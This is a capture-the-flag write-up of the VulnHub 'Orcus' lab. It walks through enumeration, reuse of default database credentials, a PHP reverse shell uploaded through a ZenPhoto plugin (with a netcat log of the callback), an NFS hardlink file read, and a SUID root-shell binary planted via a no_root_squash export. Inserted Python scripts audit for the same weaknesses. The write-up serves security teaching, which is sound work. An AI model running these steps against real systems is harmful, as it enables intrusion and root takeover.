VulnHub Orcus Solution


For background information on this series of CTFs you may want to read this page. Or, if you're just after my solution, keep reading.

Orcus

Intro

This is the last of 3 incrementally difficult CTFs created for HackFest 2016 [email protected] and released on the VulnHub platform.

Link – https://www.vulnhub.com/entry/hackfest2016-orcus,182/

Difficulty – Hard

My Solution

As always, start with an Nmap scan to see what ports are open.

[email protected]:~/orcus# nmap -p- -Pn -A -v -oX orcus_nmap.xml 192.168.5.15
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-23 13:14 GMT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating NSE at 13:14
Completed NSE at 13:14, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:14
Completed Parallel DNS resolution of 1 host. at 13:14, 0.00s elapsed
Initiating SYN Stealth Scan at 13:14
Scanning 192.168.5.15 [65535 ports]
Discovered open port 993/tcp on 192.168.5.15
Discovered open port 53/tcp on 192.168.5.15
Discovered open port 110/tcp on 192.168.5.15
Discovered open port 445/tcp on 192.168.5.15
Discovered open port 111/tcp on 192.168.5.15
Discovered open port 443/tcp on 192.168.5.15
Discovered open port 995/tcp on 192.168.5.15
Discovered open port 139/tcp on 192.168.5.15
Discovered open port 143/tcp on 192.168.5.15
Discovered open port 80/tcp on 192.168.5.15
Discovered open port 22/tcp on 192.168.5.15
Discovered open port 51994/tcp on 192.168.5.15
Discovered open port 44123/tcp on 192.168.5.15
Discovered open port 43229/tcp on 192.168.5.15
Discovered open port 54377/tcp on 192.168.5.15
Discovered open port 2049/tcp on 192.168.5.15

Looks very similar to the last two with a couple of extra services running.

Port 80 is showing the standard splash screen.

I started Nikto in the background and started looking at the service enumeration results.

Everything looked pretty standard, except that port 443 wasn't HTTP or HTTPS; it was another SSH port.

443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)

Two ports listening for incoming SSH connections seemed a bit odd. Neither port showed a banner, so nothing to help there.

Nikto was still running, so I decided to look at some more services.

The Nmap scripts show that Samba is running and accepting guest logons:

Host script results:
|_clock-skew: mean: 55m03s, deviation: 0s, median: 55m03s
| nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ORCUS<00>            Flags: <unique><active>
|   ORCUS<03>            Flags: <unique><active>
|   ORCUS<20>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: \x00
|   NetBIOS computer name: ORCUS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-23T10:22:12-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

enum4linux is a tool on Kali for enumerating SMB services. There are no open shares or vulnerabilities on this version, but there is a list of users and groups. The most interesting element is:

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

Kippo is a medium-interaction SSH honeypot and I have spent a lot of time using this tool :) This also explains the two SSH ports.

NFS is also open, so let's see if there are any shares on here. Nmap includes some useful scripts for enumerating open NFS shares:

[email protected]:~/orcus# nmap --script nfs-* 192.168.5.15
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-23 14:15 GMT
Nmap scan report for 192.168.5.15
Host is up (0.11s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
| nfs-ls: Volume /tmp
|   access: Read Lookup Modify Extend Delete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| ??????????  ?    ?    ?     ?                    .
| rwxr-xr-x   0    0    4096  2016-10-31T03:05:46  ..
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .ICE-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .Test-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .X11-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .XIM-unix
| rwxrwxrwt   0    0    4096  2017-03-23T08:42:58  .font-unix
| rwx------   0    0    4096  2017-03-23T08:43:01  systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids
| rwx------   0    0    4096  2017-03-23T08:42:58  systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io
| rwx------   0    0    4096  2017-03-23T08:42:59  vmware-root
|_
| nfs-showmount: 
|_  /tmp *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /tmp        7608792.0  3621728.0  3577516.0  51%   8.0T         32000


Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds
[email protected]:~/orcus#

/tmp on the target is exported as a share that we can reach. It looks like we can read and write but not execute. I test this by mounting the share on my local host and creating a file. (You may need to apt-get install nfs-common.)

[email protected]:~/orcus# mkdir nfsmount
[email protected]:~/orcus# mount -t nfs 192.168.5.15:/tmp nfsmount
[email protected]:~/orcus# cd nfsmount
[email protected]:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            vmware-root
systemd-private-b912b13f08a547cca382811da93446e3-systemd-timesyncd.service-QJasTL
[email protected]:~/orcus/nfsmount# echo 'test' > test.txt
[email protected]:~/orcus/nfsmount# ls
systemd-private-b912b13f08a547cca382811da93446e3-dovecot.service-3Oo1yR            test.txt
systemd-private-b912b13f08a547cca382811da93446e3-systemd-timesyncd.service-QJasTL  vmware-root
[email protected]:~/orcus/nfsmount#

There doesn't seem to be much more we can gather from this, so I head back to my Nikto results, which have just finished.

There is a lot of information in here. The robots.txt file had 30 entries which caused some noise. I started going through all the results with some interesting finds.

  • Multiple index files found: /index.html, /index.php

Index.html is our splash screen; index.php shows an error message about a database being offline.

This also identifies the software in use as Exponent CMS, which we could also gather from the other results in nikto.

  • Entry ‘/INSTALLATION.md’ in robots.txt returned a non-forbidden or redirect HTTP code (200)

This was also repeated for other files like TODO.md and README.md. By looking at these files we can determine the version number is most likely 2.0.

Searchsploit returned a few potential vulnerabilities that could be of use, but the affected files were either missing from the install or, since it was not configured for DB access, there was no valid SQL injection.

  • /phpmyadmin/: phpMyAdmin directory found

There is an installation of phpmyadmin but no version numbers listed anywhere. I tried a few known exploits but nothing worked so I started to expand my search. I wondered what else might be installed so I threw dirbuster at the web server.

My first scan with dirbuster is always a fast scan with no recursion. Some web apps have deep directories and they can take a long time to scan. If I want to scan recursively I do it per folder by setting the "Dir to start with" field.

Much the same as Nikto found, but we also found a backup folder whose listing contains ssh-creds.bak.

Trying to read the creds file results in a 403 Forbidden response, but the SimplePHPQuiz-Backup.tar.gz file is accessible.

After saving and extracting the archive I start navigating the source code. I find a db_conn.php file that looks like it still contains the default configuration.

<?php 
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){
    echo "Could not connect to MySql. Please try again";
    exit();
}

?>

I try these creds in the phpMyAdmin logon form and success, I'm in. This account has full privileges, the same as the MySQL root account.

I try to read and write files out to get more information or create a php shell but the MySQL Server has been started with increased security preventing this.
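The two findings above (a backup archive served straight from the web root, and a connection file still carrying its placeholder credentials) are both things a defender can check for mechanically. The following Python script is an added example; it is not part of the original write-up and not code from the SimplePHPQuiz or Exponent projects. It pulls string `define()` constants out of PHP source and flags credential-looking constants whose values look like defaults, and it walks a web root for leftover backup files. The PHP sample is the db_conn.php shown above; the web root it scans is a constructed temporary directory built by `make_demo_webroot()`, and all function names are this example's own.

```python
import os
import re
import tempfile
from pathlib import Path

# The db_conn.php recovered from the backup archive (values as shown in the write-up).
SAMPLE_DB_CONN = """<?php
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');
?>"""

# define('NAME', 'value') in either quoting style; PHP function names are case-insensitive.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](?P<name>[A-Za-z_][A-Za-z0-9_]*)['"]\s*,\s*['"](?P<value>[^'"]*)['"]\s*\)""",
    re.IGNORECASE,
)
SECRET_NAME_HINTS = ("PASS", "SECRET", "KEY", "TOKEN")
PLACEHOLDER_WORDS = ("password", "passwd", "secret", "changeme", "example", "default")
# Extensions that should never be reachable under a web root; the backups/ folder on this box had the first two.
BACKUP_SUFFIXES = (".bak", ".tar.gz", ".tgz", ".zip", ".old", ".orig", ".sql", "~")


def php_constants(source: str) -> dict:
    """Return {NAME: value} for every string-literal define() in the PHP source."""
    return {m.group("name"): m.group("value") for m in DEFINE_RE.finditer(source)}


def weak_credential_constants(source: str) -> list:
    """List (NAME, reason) for credential-looking constants whose value looks like a default."""
    findings = []
    for name, value in php_constants(source).items():
        if not any(hint in name.upper() for hint in SECRET_NAME_HINTS):
            continue
        low = value.lower()
        if value == "":
            findings.append((name, "empty value"))
        elif any(w in low for w in PLACEHOLDER_WORDS) or low == name.lower().replace("_", ""):
            findings.append((name, "placeholder/default value"))
        elif len(value) < 12:
            findings.append((name, "short value"))
    return findings


def exposed_backups(webroot: str) -> list:
    """Paths (relative to webroot) of files a web server would serve as downloadable backups."""
    root = Path(webroot)
    return sorted(
        str(p.relative_to(root))
        for p in root.rglob("*")
        if p.is_file() and p.name.lower().endswith(BACKUP_SUFFIXES)
    )


def make_demo_webroot() -> str:
    """Constructed web root mirroring the layout found on the box (file contents are dummies)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "backups"))
    for rel in ("index.php", "backups/ssh-creds.bak", "backups/SimplePHPQuiz-Backup.tar.gz"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("dummy\n")
    return root


if __name__ == "__main__":
    for name, reason in weak_credential_constants(SAMPLE_DB_CONN):
        print(f"db_conn.php: {name} -> {reason}")
    for rel in exposed_backups(make_demo_webroot()):
        print(f"backup file reachable under web root: {rel}")
```

Point `exposed_backups()` at a real document root to get the same list an attacker's directory brute-force would eventually produce; the fix is to keep backups outside the web root (or deny them in the server config) and to rotate any credential that shipped in one.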

Let's see what else we have.

Most of the tables are empty.

The zencart database is populated and has admin creds configured. There are vulnerabilities if I can identify the version. To do this I need to figure out the install path. It’s not in any of the tables and dirbuster didn’t find it either.

I try the obvious entries like /zencart/, /cart and /store with no luck. I throw other dictionaries at dirbuster again, without success.

Next I look to see if any of the other tables hold directory names. I also have the source for the PHP quiz, so maybe there is a vulnerability in there somewhere I can find.

I wasn't far off: as I'm checking the tables I find that zenphoto 1.4.10 is present on the server but not installed yet.

As luck would have it there is a known vulnerability in this version; all we need to do is install it first.

Configure the SQL DB options with our credentials dbuser | dbpassword, click Save and then Go :) From here just follow the setup steps to get your admin account logged in.

Grab the details of the exploit from searchsploit and test them out:

[email protected]:~/Desktop/setec-vpn# searchsploit zenphoto 1.4.10
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                                |  Path
                                                                                                                              | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
ZenPhoto 1.4.10 - Local File Inclusion                                                                                        | php/webapps/38841.txt
------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
[email protected]:~/Desktop/setec-vpn# searchsploit -p 38841
Exploit: ZenPhoto 1.4.10 - Local File Inclusion
    URL: https://www.exploit-db.com/exploits/38841/
   Path: /usr/share/exploitdb/platforms/php/webapps/38841.txt

Copied EDB-ID 38841's path to the clipboard.
[email protected]:~/Desktop/setec-vpn# 

It's a local file include that should be easy to trigger, but it just won't work :(

I start thinking of other ways to get files uploaded or php code running on the server. I spot tabs for themes and plugins. These are ideal places to upload and inject php code that I can use to get command line access.

Themes are not editable from the web UI, so that's out. At first glance it's the same for plugins: they cannot be edited or uploaded from the web UI, but there are several that are installed but not enabled... including a file uploader.

Enable this and head to the upload page and we can now push up any files we like. I start with my favourite php reverse shell from pentest monkey.

Any files we upload are placed in to http://192.168.5.15/zenphoto/uploaded/ and we can browse this folder in the browser and, after starting a netcat listener, open our shell.php page.

[email protected]:~/Desktop/setec-vpn# netcat -l -vv -p 1234
listening on [any] 1234 ...
192.168.5.15: inverse host lookup failed: Unknown host
connect to [10.0.8.2] from (UNKNOWN) [192.168.5.15] 39818
Linux Orcus 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:05 UTC 2016 i686 athlon i686 GNU/Linux
 16:03:05 up 45 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Now I have a shell it's on to my usual hands-on routine:

  1. Spawn a TTY shell
  2. Write a file listing to the web root
  3. Search for flags
  4. Upload a Linux enumeration script
$ python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/$ find / > /var/www/html/dirs.txt
find / > /var/www/html/dirs.txt
[email protected]:/$ grep flag.txt /var/www/html/dirs.txt
grep flag.txt /var/www/html/dirs.txt
/var/www/flag.txt
[email protected]:/$ cat /var/www/flag.txt
cat /var/www/flag.txt
868c889965b7ada547fae81f922e45c4
[email protected]:/$ 

The benefit of writing dirs to the html dir is that I can download these files with a browser. I could also move these all to /tmp/ where I know I can write and read files using NFS.

After running the highon.coffee Linux enumeration script there are some interesting elements: I confirmed that the Kippo SSH honeypot is running in the background and the real SSH is running on 443.

I check the Kippo logs in case our users accidentally logged in to the honeypot instead of the host device. A mistake I have never made :P Honestly.

There are no logs in the log or tty dir, so I check the config in case they are being written anywhere else. Sadly not, but I did find an extra flag for my troubles.

# Port to listen for incoming SSH connections.
# user:1:TH!SP4SSW0RDIS4Fl4G!

Back to the search for root and I couldn’t find much that helped me. I tried to read the ssh-creds.bak file that had evaded me earlier but it was write only.

total 224K
d-wx--x--x 15 www-data www-data 4.0K Mar 25 07:15 ..
drwxr-xr-x  2 www-data www-data 4.0K Nov  1 21:33 .
--w-------  1 www-data www-data   12 Nov  1 21:33 ssh-creds.bak
-rw-r--r--  1 www-data www-data 211K Oct 31 20:29 SimplePHPQuiz-Backupz.tar.gz

In a moment of desperation I started throwing random priv esc exploits at the box with no luck.

After a lot of time wandering around the box I started looking for misconfigured services that may have a way in as root. (should have started here really)!

From the list of processes running as root, Samba, NFS and Dovecot look like prime targets.

Starting with samba I had already enumerated a lot of this earlier, so I started checking the smb.conf file for anything out of place.

Everything looked pretty standard.

Next was NFS. Looking in /etc/exports everything seemed OK at first glance, but I didn't know a lot about NFS other than setting up some basic exports, so I took to Google. The following posts gave me a lot of information to get started on exploiting NFS.

The first post I started reading was NFS hardlinks from pentest monkey. Using this technique I could create a hard link from a file into the tmp dir (the export dir) and then view the file on my host from the mounted share.

I figured a good test would be the ssh-creds.bak file.

On the target run:

[email protected]:/etc/kippo$ cd /tmp 
cd /tmp
[email protected]:/tmp$ ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak
ln /var/www/html/backups/ssh-creds.bak ssh-creds.bak
[email protected]:/tmp$ 

Then from my host I can just browse into the mounted folder and view the files:

[email protected]:~/VulnHub/Orcus# mkdir nfsmount
[email protected]:~/VulnHub/Orcus# mount -t nfs 192.168.5.15:/tmp nfsmount
[email protected]:~/VulnHub/Orcus/nfsmount# ls
ssh-creds.bak                                                            systemd-private-337e8f7600944b7db31c3b6535178cce-systemd-timesyncd.service-Ql58io  vmware-root
systemd-private-337e8f7600944b7db31c3b6535178cce-dovecot.service-fW3Ids  test
[email protected]:~/VulnHub/Orcus/nfsmount# cat ssh-creds.bak
root:123456
[email protected]:~/VulnHub/Orcus/nfsmount# 

These are the default creds for kippo so I think I’m being trapped here but I try them on the real ssh port anyway with no success.

At the end of the blog post they suggest that if root_squash is enabled then I should be able to access more privileged files like shadow.

I tried several times without success so I went back to reading up on NFS and exploiting no_root_squash.

The blog posts focused on copying a binary that I could set to run with root privileges regardless of the user that launched the application.

The examples used vi to edit the shadow and passwd files. I couldn’t get them to function. I tried the same technique for the sh file to get a root shell again with no joy. The shell would launch but with my normal permissions.
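The root cause being worked here is an export that is writable by any client with root not squashed, which is exactly what a periodic review of /etc/exports should catch. The Python audit below is an added example, not part of the original write-up or of any NFS tooling: it parses exports(5) syntax into (path, client, options) tuples and flags the combinations that matter. `SAMPLE_EXPORTS` is constructed; its first line has the shape of the export found on this box (/tmp to every client, rw, no_root_squash) and its second line is a hardened equivalent. root_squash and secure are the exports(5) defaults, so an entry is only flagged when the unsafe option is spelled out; the function names are this example's own.

```python
import re

# Constructed /etc/exports for the audit: a /tmp export like the one on this box, then a hardened one.
SAMPLE_EXPORTS = """# /etc/exports (constructed sample)
/tmp        *(rw,sync,no_subtree_check,no_root_squash)
/srv/share  192.168.5.0/24(ro,sync,no_subtree_check,root_squash)
"""

EXPORT_RE = re.compile(r"^(?P<path>\S+)\s+(?P<clients>.+)$")
# Either host(opt,opt,...) or a bare host that inherits the default options.
CLIENT_RE = re.compile(r"(?P<host>\S+?)\((?P<opts>[^)]*)\)|(?P<bare>\S+)")

SENSITIVE_PATHS = ("/", "/tmp", "/var/tmp", "/etc", "/root")
ANY_CLIENT = ("*", "0.0.0.0/0", "::/0")


def parse_exports(text: str) -> list:
    """Return (path, client, [options]) tuples, one per client spec, with comments stripped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXPORT_RE.match(line)
        if not m:
            continue
        for c in CLIENT_RE.finditer(m.group("clients")):
            if c.group("bare") is not None:
                entries.append((m.group("path"), c.group("bare"), []))
            else:
                opts = [o.strip() for o in c.group("opts").split(",") if o.strip()]
                entries.append((m.group("path"), c.group("host"), opts))
    return entries


def audit_exports(text: str) -> dict:
    """Map 'path client' -> list of issues for every export that has at least one."""
    issues = {}
    for path, client, opts in parse_exports(text):
        found = []
        if "no_root_squash" in opts:
            # Client root keeps uid 0 on the server, so it can own and mark files SUID root on the export.
            found.append("no_root_squash: client root is honoured on the export")
        if client in ANY_CLIENT:
            found.append("exported to every client")
        if "rw" in opts:
            found.append("writable export")
        if "insecure" in opts:
            found.append("insecure: requests accepted from unprivileged client ports")
        if path in SENSITIVE_PATHS:
            found.append(f"sensitive or shared path {path} exported")
        if found:
            issues[f"{path} {client}"] = found
    return issues


if __name__ == "__main__":
    for key, found in audit_exports(SAMPLE_EXPORTS).items():
        print(key)
        for item in found:
            print("  -", item)
```

Feed it the contents of a real /etc/exports, or the output of `exportfs -v` reformatted one export per line, and anything that comes back with both "writable export" and "no_root_squash" is the combination used for the privilege escalation in this write-up; the fix is to drop no_root_squash, narrow the client list to the hosts that need it, and stop exporting shared scratch directories such as /tmp altogether.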

After trying the examples and failing I moved on to the next technique. This involved compiling your own C code that would start a bash shell. I used the example C code from highon.coffee:

#define _GNU_SOURCE          /* setresuid() is a GNU extension in <unistd.h> */
#include <stdlib.h>          /* system() */
#include <unistd.h>          /* setresuid() */

int main(void){
       setresuid(0, 0, 0);   /* set real, effective and saved uid to 0 when the binary is SUID root */
       system("/bin/bash");  /* launch a shell with those privileges */
       return 0;
}

On my host, create the file.

On the target, compile the binary:

[email protected]:/tmp$ gcc -o suidbash suidbash.c
gcc -o suidbash suidbash.c
suidbash.c: In function 'main':
suidbash.c:2:8: warning: implicit declaration of function 'setresuid' [-Wimplicit-function-declaration]
        setresuid(0, 0, 0);
        ^
suidbash.c:3:8: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]
        system("/bin/bash");
        ^
[email protected]:/tmp$ 

On my host, set the SUID bit:

[email protected]:~/VulnHub/Orcus/nfsmount# chown root:root suidbash
[email protected]:~/VulnHub/Orcus/nfsmount# chmod u+s suidbash
[email protected]:~/VulnHub/Orcus/nfsmount#

Back on the target, execute the file:

[email protected]:/tmp$ ./suidbash
./suidbash
[email protected]:/tmp# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
[email protected]:/tmp# 

And enjoy the root shell goodness that ensues :) It’s important to chown before chmod as chown will remove the suid bit.
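What lands on the box at the end of this chain is a root-owned SUID binary sitting in /tmp, which is a pattern a host-based check can pick up regardless of how it got there. The Python scanner below is an added example for that detection, not part of the original write-up or of any enumeration script: it walks a tree, reports every regular file with the setuid or setgid bit, and marks as suspicious any setuid file that sits in a world-writable directory or outside the directories where SUID binaries normally live. `make_demo_tree()` builds a constructed sticky, world-writable directory holding one setuid file; run as an ordinary user that file is owned by that user rather than root, but the detection logic is the same. Function names are this example's own.

```python
import os
import stat
import tempfile

# Directories where SUID binaries are expected on a Debian/Ubuntu-style system; anything elsewhere deserves a look.
EXPECTED_SUID_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec")
_EXPECTED_PREFIXES = tuple(d + "/" for d in EXPECTED_SUID_DIRS)


def find_setid_files(root: str) -> list:
    """Walk root and describe every regular file with the setuid or setgid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        try:
            dir_mode = os.lstat(dirpath).st_mode
        except OSError:
            continue
        world_writable_dir = bool(dir_mode & stat.S_IWOTH)   # /tmp-style directory
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)                            # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not (st.st_mode & (stat.S_ISUID | stat.S_ISGID)):
                continue
            hits.append({
                "path": path,
                "setuid": bool(st.st_mode & stat.S_ISUID),
                "setgid": bool(st.st_mode & stat.S_ISGID),
                "uid": st.st_uid,
                "gid": st.st_gid,
                "in_world_writable_dir": world_writable_dir,
                "outside_expected_dirs": not path.startswith(_EXPECTED_PREFIXES),
            })
    return hits


def suspicious(hit: dict) -> bool:
    """A setuid file in a world-writable or unexpected directory is the pattern seen on this box."""
    return hit["setuid"] and (hit["in_world_writable_dir"] or hit["outside_expected_dirs"])


def make_demo_tree() -> str:
    """Constructed tree: a sticky, world-writable dir (like /tmp) with one setuid file and one plain file."""
    root = tempfile.mkdtemp(prefix="suidscan_")
    os.chmod(root, 0o1777)
    for name, mode in (("suidbash", 0o4755), ("notes.txt", 0o644)):
        p = os.path.join(root, name)
        with open(p, "w") as fh:
            fh.write("dummy\n")
        os.chmod(p, mode)
    return root


if __name__ == "__main__":
    for hit in find_setid_files(make_demo_tree()):
        flag = "SUSPICIOUS" if suspicious(hit) else "ok"
        print(f"{flag:10} uid={hit['uid']} {hit['path']}")
```

Run against `/` on a schedule, diff the result against a known-good baseline, and a new SUID root file in /tmp shows up immediately. The server-side fix for this particular route is root_squash on the export; on machines that mount untrusted filesystems, the `nosuid` mount option stops the SUID bit being honoured at all.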

Now for that root flag to finish it off.

[email protected]:/tmp# find / -name flag.txt
find / -name flag.txt
/root/flag.txt
/var/www/flag.txt
[email protected]:/tmp# cat /root/flag.txt
cat /root/flag.txt
807307b49314f822985d0410de7d8bfe
[email protected]:/tmp# 

And that completes the series. I had a lot of fun working my way through these and learnt a lot along the way. A big thanks [email protected] for creating the series and of course to @VulnHub for hosting them all.

As usual Questions, Queries, Comments below.